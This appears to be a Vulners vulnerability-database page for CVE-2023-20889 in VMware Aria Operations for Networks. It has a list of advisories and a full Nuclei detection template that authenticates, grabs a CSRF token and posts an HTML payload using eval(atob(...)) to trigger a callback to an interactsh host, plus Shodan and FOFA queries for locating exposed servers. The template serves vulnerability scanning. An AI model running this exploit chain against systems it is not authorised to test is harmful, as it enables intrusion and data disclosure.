| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| CVE-2023-20887 | 7 Jun 202300:00 | – | attackerkb | |
| The vulnerability of the network and application monitoring tool used by VMware Aria Operations for Networks (previously known as vRealize Network Insight) lies in the lack of measures for data cleaning at the management level. This allows a malicious actor to gain unauthorized access to protected information and execute arbitrary commands. | 19 Jun 202300:00 | – | bdu_fstec | |
| CVE-2023-20889 | 8 Jun 202309:55 | – | circl | |
| VMware Aria Operations 命令注入漏洞 | 7 Jun 202300:00 | – | cnnvd | |
| CVE-2023-20889 | 7 Jun 202314:20 | – | cve | |
| CVE-2023-20889 | 7 Jun 202314:20 | – | cvelist | |
| VMware patches critical vulnerabilities in Aria Operations for Networks | 9 Jun 202304:00 | – | malwarebytes | |
| Vulnerabilities fixed in VMware Aria Operations Networks | 8 Jun 202300:00 | – | ncsc | |
| CVE-2023-20889 | 7 Jun 202315:15 | – | nvd | |
| CVE-2023-20889 | 7 Jun 202315:15 | – | osv |
id: CVE-2023-20889
info:
name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.
remediation: |
Apply the latest security patches provided by VMware to mitigate this vulnerability.
reference:
- https://www.zerodayinitiative.com/advisories/ZDI-23-842/
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-20889
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-20889
cwe-id: CWE-77
epss-score: 0.79117
epss-percentile: 0.9955
cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: vmware
product: vrealize_network_insight
shodan-query:
- title:"VMware Aria Operations"
- http.title:"vmware vrealize network insight"
- http.title:"vmware aria operations"
fofa-query:
- title="vmware vrealize network insight"
- title="vmware aria operations"
google-query:
- intitle:"vmware aria operations"
- intitle:"vmware vrealize network insight"
tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive,vuln
variables:
payload: location='http://{{interactsh-url}}'
http:
- raw:
- |
POST /api/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
X-Vrni-Csrf-Token: null
{"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
- |
POST /api/pdfexport HTTP/1.1
Host: {{Hostname}}
X-Vrni-Csrf-Token: {{csrf}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh
------WebKitFormBoundaryFkpSYDWZ5w9YNjmh
Content-Disposition: form-data; name="{{randstr}}"
<!DOCTYPE HTML>
<html>
<head>
<title>Test</title>
</head>
<body>
<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="eval(atob('{{base64(payload)}}'))"></xss></p>
</body>
</html>
------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- http
- type: word
part: header_2
words:
- application/octet-stream
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
group: 1
regex:
- csrfToken":"([a-z0-9A-Z/+=]+)"
internal: true
part: body
# digest: 4a0a0047304502202f12406fb362797a2c59833ada6fe3ce93d93b0d0130c45d03224b41153b135d022100d9569f41cc00cbeffa1f9fb06540174b534bdc1f55164d9103c7513dab455f06:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation